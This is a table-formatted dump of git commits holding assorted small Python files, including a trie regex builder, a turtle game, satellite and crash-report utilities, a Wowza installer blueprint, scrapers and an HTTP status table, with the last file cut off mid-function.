commit stringlengths 40 40 | subject stringlengths 1 1.49k | old_file stringlengths 4 311 | new_file stringlengths 4 311 | new_contents stringlengths 1 29.8k | old_contents stringlengths 0 9.9k | lang stringclasses 3 values | proba float64 0 1 |
|---|---|---|---|---|---|---|---|
20cebf2b93a310dac4c491b5a59f1a2846f51073 | Add basic implementation | triegex/__init__.py | triegex/__init__.py | __all__ = ('Triegex',)
class TriegexNode:
    """One node of a character trie.

    Holds a single character and a mapping from child character to child
    node; ``render`` serialises the subtree into a regex fragment.
    """
    def __init__(self, char: str, childrens=()):
        self.char = char
        self.childrens = {node.char: node for node in childrens}
    def render(self):
        """Return the regex string for this node and all of its children."""
        if not self.childrens:
            return self.char
        # Children are rendered in sorted key order for deterministic output.
        alternatives = r'|'.join(
            node.render() for _key, node in sorted(self.childrens.items())
        )
        return self.char + r'(?:{0})'.format(alternatives)
class Triegex:
    """Trie of words that can be rendered into a single regular expression."""
    def __init__(self, *words):
        # Root node carries an empty char so rendering starts at the alternation.
        self._root = TriegexNode('')
        for word in words:
            self.add(word)
    def add(self, word: str):
        """Insert *word* into the trie, creating nodes as needed.

        NOTE(review): nothing marks the end of a word, so after add('spam')
        the rendered pattern cannot require the full word -- confirm intended.
        """
        current = self._root
        for letter in word:
            current = current.childrens.setdefault(letter, TriegexNode(letter))
    def render(self):
        """Return the regex string for the whole trie."""
        return self._root.render()
    def __iter__(self):
        # NOTE(review): returns self but no __next__ is defined, so iterating
        # a Triegex raises TypeError -- this looks unfinished.
        return self
if __name__ == '__main__':
    # Ad-hoc demo: build a trie from five words and print the derived regex.
    triegex = Triegex('spam', 'eggs')
    triegex.add('foo')
    triegex.add('bar')
    triegex.add('baz')
    print(triegex.render())
    import re
print(re.findall(triegex.render(), 'baz spam eggs')) | Python | 0.000002 | |
a4ba072e7a136fe1ebb813a1592bf5c378fd855b | 优化了乌龟吃鱼游戏” | turtle_fish_game.py | turtle_fish_game.py | import random
class Turtle:
    """A turtle wandering a 10x10 pond; each move costs one energy point."""
    def __init__(self, name):
        self.name = name
        # BUG FIX: energy/x/y used to be class attributes. The random start
        # position was therefore evaluated once at class-definition time, so
        # every turtle began on the exact same square. Per-instance now.
        self.energy = 50
        self.x = random.randint(0, 10)
        self.y = random.randint(0, 10)
    def moving(self):
        """Take one random step of +/-1 or +/-2 along x or y, bouncing off walls."""
        move = random.choice([-2,-1,1,2])
        direction = random.choice(['x','y'])
        print('Turtle{0} move {1}, on {2}'.format(self.name, move, direction))
        if direction == 'x':
            position = self.x + move
            if 0 <= position <= 10:
                self.x += move
            elif position < 0:
                # Reflect off the low wall (equivalent to -position).
                self.x = - (self.x + move)
            elif position > 10:
                # Reflect off the high wall (equivalent to 20 - position).
                self.x = 10 + (10 - (self.x + move))
        if direction == 'y':
            position = self.y + move
            if 0 <= position <= 10:
                self.y += move
            elif position < 0:
                self.y = - (self.y + move)
            elif position > 10:
                self.y = 10 + (10 - (self.y + move))
        self.energy -= 1
        print('Turtle{0} Position: x={1}, y={2}, energy={3}, '.format(self.name,self.x, self.y, self.energy))
class Fish:
    """A fish taking unit steps around the same 10x10 pond."""
    def __init__(self, name):
        self.name = name
        # BUG FIX: x/y used to be class attributes -- one shared random draw
        # for every fish. Each fish now gets its own starting square.
        self.x = random.randint(0, 10)
        self.y = random.randint(0, 10)
    def moving(self):
        """Take one random +/-1 step along x or y, bouncing off the walls."""
        move = random.choice([-1, 1])
        direction = random.choice(['x','y'])
        if direction == 'x':
            position = self.x + move
            if 0 <= position <= 10:
                self.x += move
            elif position < 0:
                self.x = - (self.x + move)
            elif position > 10:
                self.x = 10 + (10 - (self.x + move))
        if direction == 'y':
            position = self.y + move
            # BUG FIX: the bound check read "1 <= position", inconsistent with
            # the x axis and with Turtle, so a fish could never move onto y == 0.
            if 0 <= position <= 10:
                self.y += move
            elif position < 0:
                self.y = - (self.y + move)
            elif position > 10:
                self.y = 10 + (10 - (self.y + move))
        print('Fish{0} Position: x={1}, y={2}'.format(self.name, self.x, self.y))
class Pool:
    """Container that spawns the requested numbers of turtles and fish.

    Turtles and fish are named '1'..'N' and kept in plain lists so the game
    loop can iterate them without caring about individual variable names.
    """
    def __init__(self, turtle_num=2, fish_num=10):
        self.turtle_num = turtle_num
        self.fish_num = fish_num
        self.turtle_list = [Turtle(str(i + 1)) for i in range(self.turtle_num)]
        self.fish_list = [Fish(str(i + 1)) for i in range(self.fish_num)]
# Run the simulation until either all fish are eaten or all turtles starve.
pool = Pool(3,10)
while len(pool.turtle_list) > 0 and len(pool.fish_list) > 0:
    # BUG FIX: iterate over copies of the lists. The original removed items
    # from the very list being iterated, which skips elements.
    for each in pool.turtle_list[:]:
        if each.energy > 0:
            each.moving()
        else:
            pool.turtle_list.remove(each)
            print('Turtle{0} have no energy!!!!'.format(each.name))
    for eachfish in pool.fish_list[:]:
        eachfish.moving()
        for eachturtle in pool.turtle_list:
            if eachfish.x == eachturtle.x and eachfish.y == eachturtle.y:
                print('Turtle{0} catch Fish{1}!! It get 20 energy!!!'.format(eachturtle.name,eachfish.name))
                eachturtle.energy += 20
                pool.fish_list.remove(eachfish)
                # BUG FIX: stop once the fish is eaten; continuing the turtle
                # loop could try to remove the same fish twice (ValueError).
                break
    if len(pool.fish_list) == 0:
        print('There is no fish!! Game Over!!')
    if len(pool.turtle_list) == 0:
        print('The turtles have no energy!! Game Over!!!')
# Log (translated):
# The June version (L37_t1_turtle.py) created the turtle and the ten fish
# objects by hand. The October revision adds the Pool class, so turtles and
# fish are initialised while building the pool object; the events inside the
# pool do not need per-object variable names, so the objects are simply kept
# in lists and iterated.
| Python | 0 | |
465956eb780ace1835e08ca2c87895d7ff1326cf | save a legacy script, may have to use again some year | util/wisc_ingest.py | util/wisc_ingest.py | import subprocess
import os
import glob
import mx.DateTime
# Ingest window: every day of December 2011 (end bound exclusive).
sts = mx.DateTime.DateTime(2011,12,1)
ets = mx.DateTime.DateTime(2012,1,1)
# Satellite sectors to (re)process.
WANT = ['EAST-CONUS','NHEM-COMP','SUPER-NATIONAL','NHEM-MULTICOMP','WEST-CONUS']
def dodate(now, dir):
    """Pipe every GINI file found for day *now* and sector *dir* through gini2gis.py."""
    base = now.strftime("/mesonet/gini/%Y_%m_%d/sat/"+dir)
    for (d2,bogus,files) in os.walk(base):
        if len(files) == 0:
            continue
        for file in files:
            # Shell out; gini2gis.py reads the raw file on stdin.
            cmd = "cat %s/%s | /usr/bin/python gini2gis.py" % (d2, file)
            print cmd
            subprocess.call(cmd, shell=True)
# Walk one day at a time over the window.
now = sts
while now < ets:
    for dir in WANT:
        dodate(now, dir)
    now += mx.DateTime.RelativeDateTime(days=1)
| Python | 0 | |
099151db3a18384ebb4b7abc17c1a38567e5d2cb | add crash scan for reporting | utils/crash_scan.py | utils/crash_scan.py | #!/usr/bin/python
import subprocess
import re
import os
# Ask adb for the attached devices; the first output line is just the header.
p = subprocess.Popen(['adb', 'devices'], stdout=subprocess.PIPE)
res = p.communicate()[0].split('\n')
res.pop(0)
devices = []
for li in res:
    m = re.search('(\w+)', li)
    if(m is not None):
        devices.append(m.group(0))
total_crash_num = 0
crash_stat_url = 'https://crash-stats.mozilla.com/report/index/'
for dev in devices:
    # adb honours ANDROID_SERIAL, so subsequent commands target this device.
    os.environ['ANDROID_SERIAL'] = dev
    crash_num = 0
    base_dir = "/data/b2g/mozilla/Crash Reports/"
    scan_cmd = ['adb', 'shell', 'ls -l']
    submit_dir = base_dir + 'submitted'
    pending_dir = base_dir + 'pending'
    # Submitted reports: extract the crash-stats id from each "bp-<id>.txt".
    p = subprocess.Popen(scan_cmd + [submit_dir], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    output = p.communicate()[0]
    crash_id = []
    if "No such" not in output:
        for out in output.split('\n'):
            if out.strip() != "":
                cid = re.search('\sbp-(\S+)\.txt$', out.strip()).group(1)
                crash_id.append(cid)
                crash_num += 1
    # Pending reports are only counted; they have no crash-stats id yet.
    q = subprocess.Popen(scan_cmd + [pending_dir], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    output = q.communicate()[0]
    if "No such" not in output:
        for out in output.split('\n'):
            if out.strip() != "":
                crash_num += 1
    print("device " + dev + " has " + str(crash_num) + " crashes.")
    total_crash_num += crash_num
    if crash_id:
        print("Submitted: ")
        for cid in crash_id:
            print(crash_stat_url + cid)
print("Total crash number = " + str(total_crash_num))
| Python | 0 | |
9ddb89b4b652fb3026632ffd79dea9321f58cc31 | bump version in __init__.py | oneflow/__init__.py | oneflow/__init__.py |
VERSION = '0.16.4'
|
VERSION = '0.16.3.1'
| Python | 0.000023 |
9d994180a38976939e5da1757303ef8ed76f5e07 | bump version in __init__.py | oneflow/__init__.py | oneflow/__init__.py |
VERSION = '0.19.1'
|
VERSION = '0.19'
| Python | 0.000023 |
aaca641f968bf12eb2177460f8cf809d62ea3bd4 | Add a strict version of itertools.groupby | bidb/utils/itertools.py | bidb/utils/itertools.py | from __future__ import absolute_import
import itertools
def groupby(iterable, keyfunc, sortfunc=lambda x: x):
    """Eagerly group *iterable* like ``itertools.groupby``.

    Returns a list of ``(key, members)`` pairs where each ``members`` list is
    fully materialised and sorted by *sortfunc*, so the result is safe to use
    after iteration (unlike the lazy stdlib groups).
    """
    grouped = []
    for key, members in itertools.groupby(iterable, keyfunc):
        grouped.append((key, sorted(members, key=sortfunc)))
    return grouped
| Python | 0.000003 | |
d2c414576cfcf935ed36ffe2c5fb594911be0832 | work on sge module started | sge.py | sge.py | from collections import OrderedDict
__author__ = 'sfranky'
from lxml import etree
fn = '/home/sfranky/PycharmProjects/results/gef_sge1/qstat.F.xml.stdout'
tree = etree.parse(fn)
root = tree.getroot()
def extract_job_info(elem, elem_text):
    """
    Collect job descriptions from *elem*.

    Walks every descendant of *elem* tagged *elem_text* (a qstat
    ``job_list`` element) and returns a list of dicts with the job's state,
    name, owner, slot count and job number (all as text).
    """
    collected = []
    for node in elem.iter(elem_text):
        collected.append({
            'job_state': node.find('./state').text,
            'job_name': node.find('./JB_name').text,
            'job_owner': node.find('./JB_owner').text,
            'job_slots': node.find('./slots').text,
            'job_nr': node.find('./JB_job_number').text,
        })
    return collected
# Build one dict per SGE queue instance with hostname, processor count and a
# core -> job-number map for the jobs currently running there.
worker_nodes = list()
for queue_elem in root.iter('Queue-List'):
    d = OrderedDict()
    queue_name = queue_elem.find('./resource[@name="qname"]').text
    d['domainname'] = host_name = queue_elem.find('./resource[@name="hostname"]').text
    slots_total = queue_elem.find('./slots_total').text
    d['np'] = queue_elem.find('./resource[@name="num_proc"]').text
    slots_used = queue_elem.find('./slots_used').text
    slots_resv = queue_elem.find('./slots_resv').text
    # print queue_name, host_name, slots_total, slots_used, slots_resv
    running_jobs = extract_job_info(queue_elem, 'job_list')
    # Cores are numbered by enumeration order, not by any scheduler binding.
    d['core_job_map'] = [{'core': idx, 'job': job['job_nr']} for idx, job in enumerate(running_jobs)]
    worker_nodes.append(d)
# Jobs under ./job_info (outside any queue) are the pending ones.
job_info_elem = root.find('./job_info')
# print 'PENDING JOBS'
pending_jobs = extract_job_info(job_info_elem, 'job_list')
| Python | 0 | |
482a2639911b676bf68dcd529dcc1ffecaaf10ea | Create shortner.py | plugins/shortner.py | plugins/shortner.py | Python | 0.000002 | ||
5ae58621bd766aeaa6f1838397b045039568887c | Add driver to find plate solutions | platesolve.py | platesolve.py | import babeldix
import sys
import operator
# Print solutions in order of increasing score
# (one "<plate> <score> <solution>" line per solution, per CLI argument).
for plate in sys.argv[1:]:
    solns = babeldix.Plates.get_solutions(plate)
    for (soln,score) in sorted(solns.items(), key=operator.itemgetter(1)):
        print '{0:s} {1:d} {2:s}'.format(plate,score,soln)
| Python | 0 | |
c1bfe92878edc3f9598a6d97046775cb8d9b0aa0 | Make migration for item-visibility change | depot/migrations/0009_auto_20170330_1342.py | depot/migrations/0009_auto_20170330_1342.py | # -*- coding: utf-8 -*-
# Generated by Django 1.10.6 on 2017-03-30 13:42
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated: redefine the choices for ``Item.visibility``
    (public/private/deleted, stored as single characters '1'/'2'/'3')."""
    dependencies = [
        ('depot', '0008_auto_20170330_0855'),
    ]
    operations = [
        migrations.AlterField(
            model_name='item',
            name='visibility',
            field=models.CharField(choices=[('1', 'public'), ('2', 'private'), ('3', 'deleted')], max_length=1),
        ),
    ]
| Python | 0.000006 | |
03ecddce6f34d04957ca5161eb7d776daf02ed47 | Add blobdb messages | protocol/blobdb.py | protocol/blobdb.py | __author__ = 'katharine'
from base import PebblePacket
from base.types import *
class InsertCommand(PebblePacket):
    """BlobDB insert: store *value* under *key* (both length-prefixed)."""
    key_size = Uint8()
    key = BinaryArray(length=key_size)
    value_size = Uint16()
    value = BinaryArray(length=value_size)
class DeleteCommand(PebblePacket):
    """BlobDB delete: remove the entry for the length-prefixed *key*."""
    key_size = Uint8()
    key = BinaryArray(length=key_size)
class ClearCommand(PebblePacket):
    """BlobDB clear: wipe the whole database; carries no payload."""
    pass
class BlobCommand(PebblePacket):
    """Envelope for a BlobDB request: command byte selects the payload type."""
    command = Uint8()
    token = Uint16()
    database = Uint8()
    # Dispatch on the command byte: 0x01 insert, 0x04 delete, 0x05 clear.
    content = Union(command, {
        0x01: InsertCommand,
        0x04: DeleteCommand,
        0x05: ClearCommand,
    })
| Python | 0 | |
cf0310a7111bdb79b4bbe2a52095c8344778c80c | Add admin.py for protocols | protocols/admin.py | protocols/admin.py | from django.contrib import admin
from .models import Protocol
admin.site.register(Protocol) | Python | 0 | |
98ed7f3f682bf1ba23bb0030aa81e8fff23e54ad | Add harvester | scrapi/harvesters/uow.py | scrapi/harvesters/uow.py | '''
Harvester for the Research Online for the SHARE project
Example API call: http://ro.uow.edu.au/do/oai/?verb=ListRecords&metadataPrefix=oai_dc
'''
from __future__ import unicode_literals
from scrapi.base import OAIHarvester
class UowHarvester(OAIHarvester):
    """OAI-PMH harvester for University of Wollongong Research Online.

    All behaviour comes from OAIHarvester; this class only supplies the
    endpoint configuration.
    """
    short_name = 'uow'
    long_name = 'University of Wollongong Research Online'
    url = 'http://ro.uow.edu.au'
    base_url = 'http://ro.uow.edu.au/do/oai/'
    # Extra Dublin Core properties to keep from each record.
    property_list = ['date', 'source', 'identifier', 'type', 'format', 'setSpec']
    timezone_granularity = True
| Python | 0.000012 | |
1b4ca9e9afccfc1492aeea955f2cd3c783f1dc80 | Create file_parser.py | file_parser.py | file_parser.py | # -*- coding: utf-8 -*-
"""
Created on Thu Mar 19 17:03:35 2015
@author: pedro.correia
"""
from __future__ import division # Just making sure that correct integer division is working
import numpy as np # This is numpy,python numerical library
import xlrd as xcl # This library allow you to manipulate (read and write) excel files
import cPickle as pickle # Library used to save and load dictionaries
import objects_parser as obj # Our local objects library.
def __open_excel_book__(path):
    """
    NOTE: internal function. Use open_excel_file function.
    User gives a string path and this function returns the open excel book.
    """
    # on_demand avoids loading every sheet into memory up front.
    book = xcl.open_workbook(path,on_demand=True)
    return book
def __array_by_type__(sheet,col,null=-999):
    """
    NOTE: internal function. Use open_excel_file function.
    This function receives sheet and column number and returns an array with the
    correct type. The null is by default -999 but you can change it on the third
    argument.
    """
    # Probe the first data row (row 1) to decide numeric vs. string column.
    try:
        float(sheet.cell_value(1, col))
        return np.zeros(sheet.nrows,dtype=type(sheet.cell_value(1, col))),null
    except ValueError:
        # NOTE(review): '|S15' silently truncates strings longer than 15
        # bytes, and the returned null becomes its str() form -- confirm OK.
        return np.zeros(sheet.nrows,dtype='|S15'),str(null) #type(sheet.cell_value(1, col))),str(null)
def __build_excel_dictionary__(book,null=-999):
    """
    NOTE: internal function. Use open_excel_file function.
    Function that receives an excel book (see: __open_excel_book__) and extracts to
    dictionaries (with numpy arrays) all information from the excel book. Empty
    cells are given the null value (default is -999).
    """
    sheet_dictionary = {}
    for name in book.sheet_names():
        sheet = book.sheet_by_name(name)
        local_dictionary = {}
        for col in xrange(sheet.ncols):
            # NOTE(review): `null` is rebound here; once a string column is
            # seen it stays str(null) for all later columns -- confirm intended.
            local_array,null = __array_by_type__(sheet,col,null)
            # Row 0 is the header and is never filled, so index 0 of each
            # array keeps the dtype default (0 or empty string).
            for row in xrange(1,sheet.nrows):
                if sheet.cell_type(row, col) in (xcl.XL_CELL_EMPTY, xcl.XL_CELL_BLANK):
                    local_array[row] = null
                else:
                    local_array[row] = sheet.cell_value(row, col)
            # Column arrays are keyed by the header cell text.
            local_dictionary[sheet.cell_value(0, col)] = local_array
        sheet_dictionary[name] = local_dictionary
    return sheet_dictionary
def open_excel_file(path,null=-999):
    """
    Function that opens excel file into a excel_class_object and return the
    last.
    """
    book = __open_excel_book__(path)
    data = obj.excelObject(__build_excel_dictionary__(book,null),null)
    return data
def save_excel_object(path,obj):
    """
    Saves excel object to file. Give path and excel object.
    """
    # NOTE(review): the parameter `obj` shadows the module alias `obj`
    # imported at the top of this file -- works here, but fragile.
    with open(path, 'wb') as outfile:
        pickle.dump(obj.me, outfile, protocol=pickle.HIGHEST_PROTOCOL)
def open_excel_object(path,null=-999):
    """
    Creates an excel object from epy (pickle) loaded file.
    """
    return obj.excelObject(pickle.load(open(path, "rb" )),null)
| Python | 0 | |
26d364765cdb0e4e4bf755286d92c305b8dabb0c | Add files via upload | find_qCodes.py | find_qCodes.py | __author__ = 'zoorobmj'
import re
import csv
import os
if __name__ == '__main__':
    folder = "C:\Users\zoorobmj\PycharmProjects\Question_Matrix" # my directory
    files = [f for f in os.listdir(folder) if f.endswith('.txt')]
    q_list = []
    # NOTE(review): this iterates over the *characters* of the folder string
    # and re-reads the hard-coded 'CoreESP2016.txt' on every pass; `files` is
    # never used. Presumably meant `for f in files:` with `open(f)` -- confirm.
    for f in folder:
        Qs = open('CoreESP2016.txt', 'r').read()
        # print Qs
        # find all meeting this pattern
        # get unique values
        # return as csv
        # Question codes look like uppercase letters/digits ending in a dot.
        q_codes = re.findall(r"[A-Z]+[A-Z0-9]*[.]", Qs)
        q_list.append(q_codes)
    with open("CoreESP2016.csv", 'wb') as output:
        writer = csv.writer(output, lineterminator='\n')
        for val in q_list:
            if len(val)==2:
                print val
            else:
writer.writerow([val]) | Python | 0 | |
5ae45bfbbd6559d344eb641853ef8e83b3ff1c90 | Add wowza blueprint | blues/wowza.py | blues/wowza.py | """
Wowza Blueprint
===============
**Fabric environment:**
.. code-block:: yaml
blueprints:
- blues.wowza
"""
from fabric.decorators import task
from refabric.api import run, info
from refabric.context_managers import sudo
from refabric.contrib import blueprints
from . import debian
__all__ = ['start', 'stop', 'restart', 'setup', 'configure']
blueprint = blueprints.get(__name__)
# Service-control tasks delegate to the debian blueprint helper.
start = debian.service_task('WowzaStreamingEngine', 'start')
stop = debian.service_task('WowzaStreamingEngine', 'stop')
restart = debian.service_task('WowzaStreamingEngine', 'restart')
wowza_root ='/usr/local/WowzaMediaServer/'
@task
def setup():
    """
    Install and configure Wowza
    """
    install()
    configure()
def install():
    """Download the Wowza self-extracting installer and run it (as root)."""
    with sudo():
        info('Downloading wowza')
        # Version is configurable per-deployment via the blueprint settings.
        version = blueprint.get('wowza_version', '4.1.2')
        binary = 'WowzaStreamingEngine-{}.deb.bin'.format(version)
        # The download URL encodes the version with dashes instead of dots.
        version_path = version.replace('.', '-')
        url = 'http://www.wowza.com/downloads/WowzaStreamingEngine-{}/{}'.format(version_path,
                                                                                 binary)
        run('wget -P /tmp/ {url}'.format(url=url))
        debian.chmod('/tmp/{}'.format(binary), '+x')
        info('Installing wowza')
        run('/tmp/{}'.format(binary))
@task
def configure():
    """
    Configure Wowza
    """
| Python | 0 | |
0e53f398bf2cf885393865ec1f899308bb56625b | Add a low-level example for creating views. | examples/create_a_view_low_level.py | examples/create_a_view_low_level.py | """
A low level example:
This is how JenkinsAPI creates views
"""
import requests
import json
# POST the form-encoded JSON payload Jenkins expects at /newView.
url = 'http://localhost:8080/newView'
str_view_name = "ddsfddfd"
params = {}# {'name': str_view_name}
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
# Jenkins wants the view definition wrapped in a 'json' form field.
data = {
    "mode": "hudson.model.ListView",
    #"Submit": "OK",
    "name": str_view_name
}
# Try 1
result = requests.post(url, params=params, data={'json':json.dumps(data)}, headers=headers)
print result.text.encode('UTF-8')
| Python | 0 | |
4c73cad398d5dac85b264187f709a860f356b311 | Add new file with mixin for mysql | smipyping/_mysqldbmixin.py | smipyping/_mysqldbmixin.py | #!/usr/bin/env python
# (C) Copyright 2017 Inova Development Inc.
# All Rights Reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function, absolute_import
from mysql.connector import MySQLConnection
class MySQLDBMixin(object):
    """
    Provides some common methods to mixin in with the MySQL...Tables
    classes
    """
    def connectdb(self, db_dict, verbose):
        """Open a MySQL connection from *db_dict* (host/database/user/password)
        and store it on ``self.connection``; raise ValueError on failure."""
        try:
            connection = MySQLConnection(host=db_dict['host'],
                                         database=db_dict['database'],
                                         user=db_dict['user'],
                                         password=db_dict['password'])
            if connection.is_connected():
                self.connection = connection
                if verbose:
                    print('sql db connection established. host %s, db %s' %
                          (db_dict['host'], db_dict['database']))
            else:
                print('SQL database connection failed. host %s, db %s' %
                      (db_dict['host'], db_dict['database']))
                raise ValueError('Connection to database failed')
        # NOTE(review): this also catches and re-wraps the ValueError raised
        # just above, losing the original traceback.
        except Exception as ex:
            raise ValueError('Could not connect to sql database %r. '
                             ' Exception: %r'
                             % (db_dict, ex))
    def _load_table(self):
        """
        Load the internal dictionary from the database based on the
        fields definition
        """
        try:
            # dictionary=True makes fetchall() return dicts keyed by column.
            cursor = self.connection.cursor(dictionary=True)
            fields = ', '.join(self.fields)
            sql = 'SELECT %s FROM %s' % (fields, self.table_name)
            cursor.execute(sql)
            rows = cursor.fetchall()
            # Index rows by the configured key field.
            for row in rows:
                key = row[self.key_field]
                self.data_dict[key] = row
        except Exception as ex:
            raise ValueError('Error: setup sql based targets table %r. '
                             'Exception: %r'
                             % (self.db_dict, ex))
| Python | 0 | |
206c99420101655d7495000d659d571ef729300b | Add areas spider | soccerway/spiders/areas.py | soccerway/spiders/areas.py | # -*- coding: utf-8 -*-
import scrapy
from soccerway.items import Match
from urllib.parse import urlencode
class AreasSpider(scrapy.Spider):
    """Spider that fetches the soccerway league listings for a range of areas."""
    name = "areas"
    # BUG FIX: allowed_domains entries must be bare domain names. With the
    # "http://" scheme included, Scrapy's offsite middleware can never match
    # the domain and follow-up requests get filtered out.
    allowed_domains = ["www.soccerway.mobi"]
    start_urls = ['http://www.soccerway.mobi/?']
    # Base query string; area_id is overwritten per request in start_requests.
    params = {
        "sport": "soccer",
        "page": "leagues",
        "view" : "by_area",
        "area_id" : "212",
        "localization_id": "www"
    }
    def start_requests(self):
        """Yield one request per area id (8..10), routed through a local proxy."""
        for i in range(8,11):
            self.params['area_id'] = str(i)
            request = scrapy.Request(url=self.start_urls[0]+urlencode(self.params), callback=self.parse)
            request.meta['proxy'] = 'http://127.0.0.1:8118'
            yield request
    def parse(self, response):
        self.log('URL: {}'.format(response.url))
    """
    def parse(self, response):
        venue = Venue()
        venue['country'], venue['city'], venue['name'] = response.css('title::text')[0].extract().split(',')
        res = response.xpath('//td//b/text()')
        if len(res) > 0:
            venue['opened'] = res[0].extract()
        res = response.xpath('//td//b/text()')
        if len(res) > 1:
            venue['capacity'] = res[1].extract()
        venue['lat'], venue['lng'] = response.xpath('//script/text()')[1].re(r'\((.*)\)')[1].split(',')
        return venue
    """
| Python | 0.000002 | |
171de05d8ea4a31b0f97c38206b44826364d7693 | Add http_status.py | netlib/http_status.py | netlib/http_status.py |
# Symbolic names for HTTP status codes (RFC 2616 terminology).
CONTINUE = 100
SWITCHING = 101

OK = 200
CREATED = 201
ACCEPTED = 202
NON_AUTHORITATIVE_INFORMATION = 203
NO_CONTENT = 204
RESET_CONTENT = 205
PARTIAL_CONTENT = 206
MULTI_STATUS = 207

MULTIPLE_CHOICE = 300
MOVED_PERMANENTLY = 301
FOUND = 302
SEE_OTHER = 303
NOT_MODIFIED = 304
USE_PROXY = 305
TEMPORARY_REDIRECT = 307

BAD_REQUEST = 400
UNAUTHORIZED = 401
PAYMENT_REQUIRED = 402
FORBIDDEN = 403
NOT_FOUND = 404
NOT_ALLOWED = 405
NOT_ACCEPTABLE = 406
PROXY_AUTH_REQUIRED = 407
REQUEST_TIMEOUT = 408
CONFLICT = 409
GONE = 410
LENGTH_REQUIRED = 411
PRECONDITION_FAILED = 412
REQUEST_ENTITY_TOO_LARGE = 413
REQUEST_URI_TOO_LONG = 414
UNSUPPORTED_MEDIA_TYPE = 415
REQUESTED_RANGE_NOT_SATISFIABLE = 416
EXPECTATION_FAILED = 417

INTERNAL_SERVER_ERROR = 500
NOT_IMPLEMENTED = 501
BAD_GATEWAY = 502
SERVICE_UNAVAILABLE = 503
GATEWAY_TIMEOUT = 504
HTTP_VERSION_NOT_SUPPORTED = 505
INSUFFICIENT_STORAGE_SPACE = 507
NOT_EXTENDED = 510

# Human-readable reason phrase for each code above.
RESPONSES = {
    # 100
    CONTINUE: "Continue",
    SWITCHING: "Switching Protocols",

    # 200
    OK: "OK",
    CREATED: "Created",
    ACCEPTED: "Accepted",
    NON_AUTHORITATIVE_INFORMATION: "Non-Authoritative Information",
    NO_CONTENT: "No Content",
    RESET_CONTENT: "Reset Content.",
    PARTIAL_CONTENT: "Partial Content",
    MULTI_STATUS: "Multi-Status",

    # 300
    MULTIPLE_CHOICE: "Multiple Choices",
    MOVED_PERMANENTLY: "Moved Permanently",
    FOUND: "Found",
    SEE_OTHER: "See Other",
    NOT_MODIFIED: "Not Modified",
    USE_PROXY: "Use Proxy",
    # 306 not defined??
    TEMPORARY_REDIRECT: "Temporary Redirect",

    # 400
    BAD_REQUEST: "Bad Request",
    UNAUTHORIZED: "Unauthorized",
    PAYMENT_REQUIRED: "Payment Required",
    FORBIDDEN: "Forbidden",
    NOT_FOUND: "Not Found",
    NOT_ALLOWED: "Method Not Allowed",
    NOT_ACCEPTABLE: "Not Acceptable",
    PROXY_AUTH_REQUIRED: "Proxy Authentication Required",
    REQUEST_TIMEOUT: "Request Time-out",
    CONFLICT: "Conflict",
    GONE: "Gone",
    LENGTH_REQUIRED: "Length Required",
    PRECONDITION_FAILED: "Precondition Failed",
    REQUEST_ENTITY_TOO_LARGE: "Request Entity Too Large",
    REQUEST_URI_TOO_LONG: "Request-URI Too Long",
    UNSUPPORTED_MEDIA_TYPE: "Unsupported Media Type",
    REQUESTED_RANGE_NOT_SATISFIABLE: "Requested Range not satisfiable",
    EXPECTATION_FAILED: "Expectation Failed",

    # 500
    INTERNAL_SERVER_ERROR: "Internal Server Error",
    NOT_IMPLEMENTED: "Not Implemented",
    BAD_GATEWAY: "Bad Gateway",
    SERVICE_UNAVAILABLE: "Service Unavailable",
    GATEWAY_TIMEOUT: "Gateway Time-out",
    HTTP_VERSION_NOT_SUPPORTED: "HTTP Version not supported",
    INSUFFICIENT_STORAGE_SPACE: "Insufficient Storage Space",
    NOT_EXTENDED: "Not Extended"
}
| Python | 0.000501 | |
922cdfeeda103cf0ec21ad0e40ca5034dedfc03d | Add fixup_headers script based on that in MOOSE | scripts/fixup_headers.py | scripts/fixup_headers.py | #!/usr/bin/env python2
# This script checks and can optionally update Zapdos source files.
# You should always run this script without the "-u" option
# first to make sure there is a clean dry run of the files that should
# be updated
# This is based on a script of the same name in the MOOSE Framework
import os, string, re, shutil
from optparse import OptionParser
global_ignores = ['contrib', '.svn', '.git', 'crane', 'moose', 'squirrel']
unified_header = """\
//* This file is part of Zapdos, an open-source
//* application for the simulation of plasmas
//* https://github.com/shannon-lab/zapdos
//*
//* Zapdos is powered by the MOOSE Framework
//* https://www.mooseframework.org
//*
//* Licensed under LGPL 2.1, please see LICENSE for details
//* https://www.gnu.org/licenses/lgpl-2.1.html"""
python_header = """\
#* This file is part of Zapdos, an open-source
#* application for the simulation of plasmas
#* https://github.com/shannon-lab/zapdos
#*
#* Zapdos is powered by the MOOSE Framework
#* https://www.mooseframework.org
#*
#* Licensed under LGPL 2.1, please see LICENSE for details
#* https://www.gnu.org/licenses/lgpl-2.1.html"""
global_options = {}
def fixupHeader():
    """Walk the tree below the CWD and check/update headers in C++/Python files."""
    for dirpath, dirnames, filenames in os.walk(os.getcwd() + ""):
        # Don't traverse into ignored directories
        # (mutating dirnames in place prunes os.walk).
        for ignore in global_ignores:
            if ignore in dirnames:
                dirnames.remove(ignore)
        #print dirpath
        #print dirnames
        for file in filenames:
            suffix = os.path.splitext(file)
            if (suffix[-1] == '.C' or suffix[-1] == '.h') and not global_options.python_only:
                checkAndUpdateCPlusPlus(os.path.abspath(dirpath + '/' + file))
            if suffix[-1] == '.py' and not global_options.cxx_only:
                checkAndUpdatePython(os.path.abspath(dirpath + '/' + file))
def checkAndUpdateCPlusPlus(filename):
    """Report (or, with -u, rewrite) the license header of one C++ file."""
    # Don't update soft links
    if os.path.islink(filename):
        return
    f = open(filename)
    text = f.read()
    f.close()
    header = unified_header
    # Check (exact match only)
    if (string.find(text, header) == -1 or global_options.force == True):
        # print the first 10 lines or so of the file
        if global_options.update == False: # Report only
            print filename + ' does not contain an up to date header'
            if global_options.verbose == True:
                print '>'*40, '\n', '\n'.join((text.split('\n', 10))[:10]), '\n'*5
        else:
            # Make sure any previous C-style header version is removed
